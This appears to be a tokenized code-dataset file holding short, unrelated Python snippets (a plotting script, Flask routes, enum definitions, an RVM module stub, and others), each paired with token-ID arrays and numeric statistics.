s = init.create_single_particle_state(imsize=64, radius=1, sigma=0.05)
blocks = s.blocks_particle(0)
for rad in rads:
print "Radius", rad
s.update(blocks[-1], np.array([rad]))
crb = []
for block in blocks:
crb.append( s.fisher_information([block])[0,0] )
crbs.append(crb)
crbs = 1.0 / np.sqrt(np.array(crbs))
pl.figure()
pl.loglog(rads, crbs[:,0], 'o-', lw=1, label='pos-z')
pl.loglog(rads, crbs[:,1], 'o-', lw=1, label='pos-y')
pl.loglog(rads, crbs[:,2], 'o-', lw=1, label='pos-x')
pl.loglog(rads, crbs[:,3], 'o-', lw=1, label='rad')
pl.legend(loc='upper right')
pl.xlabel("Radius")
pl.ylabel("CRB")
pl.show()
| [
11748,
299,
32152,
355,
45941,
198,
11748,
279,
2645,
397,
355,
458,
198,
198,
6738,
583,
72,
13,
9288,
1330,
2315,
198,
198,
6098,
1443,
796,
17635,
198,
81,
5643,
796,
45941,
13,
283,
858,
7,
16,
11,
838,
11,
352,
19571,
20,
8,
... | 2.066327 | 392 |
#!/usr/bin/python
import simple_test
simple_test.test("test27", [])
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
11748,
2829,
62,
9288,
198,
198,
36439,
62,
9288,
13,
9288,
7203,
9288,
1983,
1600,
685,
12962,
198
] | 2.592593 | 27 |
import calendar
import json
import os.path
import warnings
from pathlib import Path
from collections import OrderedDict
in_json = Path('/media/data/GDL_all_images/data_file.json')
out_json = Path('/media/data/GDL_all_images/data_file_dates.json')
root_cutoff = Path('/media/data/')
img_root_dir = '/media/data/GDL_all_images/WV2'
generate_json(img_root_dir, out_json, root_cutoff, debug=False) | [
11748,
11845,
198,
11748,
33918,
198,
11748,
28686,
13,
6978,
198,
11748,
14601,
198,
198,
6738,
3108,
8019,
1330,
10644,
198,
6738,
17268,
1330,
14230,
1068,
35,
713,
198,
198,
259,
62,
17752,
796,
10644,
10786,
14,
11431,
14,
7890,
14... | 2.744828 | 145 |
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This manages Project Enums."""
from .base_enum import ExtendedIntEnum
class ProjectRoles(ExtendedIntEnum):
"""This enum provides the list of Project Roles."""
Developer = 1, 'Developer'
Manager = 2, 'Manager'
Cto = 3, 'Executive Sponsor'
class ProjectStatus(ExtendedIntEnum):
"""This enum provides the list of Project Status."""
Draft = 1, 'Draft'
Dev = 2, 'Development'
DevComplete = 3, 'Development Complete'
ComplianceChecks = 4, 'Compliance Checks'
ComplianceReview = 5, 'Compliance Review'
ComplianceChecksComplete = 6, 'Compliance Checks Complete'
AwaitingProdKeys = 7, 'Awaiting Prod Keys'
InProd = 8, 'In Prod'
| [
2,
15069,
10673,
13130,
22783,
286,
3517,
9309,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
... | 3.355263 | 380 |
######################################
# Django 模块
######################################
from django.db import models
from django.db.models import Q
######################################
# 系统模块
######################################
import datetime
######################################
# 自定义模块
######################################
from usr.models import UserProfile
######################################
# 平台表
######################################
######################################
# 平台用户表
######################################
| [
29113,
4242,
2235,
198,
2,
37770,
10545,
101,
94,
161,
251,
245,
198,
29113,
4242,
2235,
198,
6738,
42625,
14208,
13,
9945,
1330,
4981,
198,
6738,
42625,
14208,
13,
9945,
13,
27530,
1330,
1195,
198,
198,
29113,
4242,
2235,
198,
2,
133... | 4.036496 | 137 |
"""
RHESSI LightCurve Tests
"""
from __future__ import absolute_import
import pytest
import sunpy.lightcurve
from sunpy.time import TimeRange
from numpy import all
| [
198,
37811,
198,
48587,
7597,
40,
4401,
26628,
303,
30307,
198,
37811,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
198,
11748,
12972,
9288,
198,
11748,
4252,
9078,
13,
2971,
22019,
303,
198,
6738,
4252,
9078,
13,
2435,
133... | 3.34 | 50 |
from .graph import graph
from .graph2 import graph2
| [
6738,
764,
34960,
1330,
4823,
198,
6738,
764,
34960,
17,
1330,
4823,
17,
198
] | 3.714286 | 14 |
from flask import Flask
from flask import render_template,request,redirect,url_for,abort
from ..models import User,Citizen
from . import main
from .forms import SearchForm,AdminForm
from .. import db,photos
from flask_login import login_required,current_user
import markdown2
@main.route('/',methods = ['GET','POST'])
def index():
'''
View root page function that returns the index page and its data
'''
title = 'Home - Welcome to The citizens Website Online'
return render_template('index.html', title = title)
@main.route('/about',methods = ['GET','POST'])
def about():
'''
View root page function that returns the index page and its data
'''
title = 'About UIP'
return render_template('about.html', title = title)
@main.route('/search',methods= ['GET','POST'])
@login_required
| [
6738,
42903,
1330,
46947,
198,
6738,
42903,
1330,
8543,
62,
28243,
11,
25927,
11,
445,
1060,
11,
6371,
62,
1640,
11,
397,
419,
198,
6738,
11485,
27530,
1330,
11787,
11,
34,
36958,
198,
6738,
764,
1330,
1388,
198,
6738,
764,
23914,
133... | 3.185328 | 259 |
# Time: O(m * n)
# Space: O(m * n)
# Given a matrix consists of 0 and 1, find the distance of the nearest 0 for each cell.
# The distance between two adjacent cells is 1.
#
# Example 1:
#
# Input:
# 0 0 0
# 0 1 0
# 0 0 0
#
# Output:
# 0 0 0
# 0 1 0
# 0 0 0
#
# Example 2:
#
# Input:
# 0 0 0
# 0 1 0
# 1 1 1
#
# Output:
# 0 0 0
# 0 1 0
# 1 2 1
#
# Note:
# The number of elements of the given matrix will not exceed 10,000.
# There are at least one 0 in the given matrix.
# The cells are adjacent in only four directions: up, down, left and right.
| [
2,
3862,
25,
220,
440,
7,
76,
1635,
299,
8,
198,
2,
4687,
25,
440,
7,
76,
1635,
299,
8,
198,
198,
2,
11259,
257,
17593,
10874,
286,
657,
290,
352,
11,
1064,
262,
5253,
286,
262,
16936,
657,
329,
1123,
2685,
13,
198,
2,
383,
... | 2.619048 | 210 |
__all__ = ['rvm']
import numpy as np
#import pdb
#from pyandres import cholInvert
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# Initialization
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# Pre-process basis
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# Compute the full statistics
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# One iteration
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# Iterate until convergence
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# Post-process
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#***************
# Test
#***************
#import matplotlib.pyplot as pl
#N = 10
#M = 11
#XStenflo = np.asarray([-2.83000,-1.18000,0.870000,1.90000,3.96000,5.01000,6.25000,8.10000,9.98000,12.1200]).T
#Outputs = np.asarray([0.0211433,0.0167467,0.00938793,0.0183543,-0.00285475,-0.000381000,0.00374350,0.000126900,0.0121750,0.0268133]).T
## Define the basis functions. Gaussians of width 3.4 evaluated at the observed points
#basisWidth = 3.4
#C = XStenflo[:,np.newaxis]
#Basis = np.exp(-(XStenflo-C)**2 / basisWidth**2)
#Basis = np.hstack([Basis, np.ones((1,N)).T])
## Instantitate the RVM object and train it
#p = rvm(Basis, Outputs, noise=0.018)
#p.iterateUntilConvergence()
## Do some plots
#f = pl.figure(num=0)
#ax = f.add_subplot(1,1,1)
#ax.plot(XStenflo, Outputs, 'ro')
#ax.plot(XStenflo, np.dot(Basis, p.wInferred))
| [
834,
439,
834,
796,
37250,
81,
14761,
20520,
198,
11748,
299,
32152,
355,
45941,
198,
2,
11748,
279,
9945,
198,
2,
6738,
12972,
392,
411,
1330,
442,
349,
818,
1851,
198,
198,
2,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
... | 2.593985 | 665 |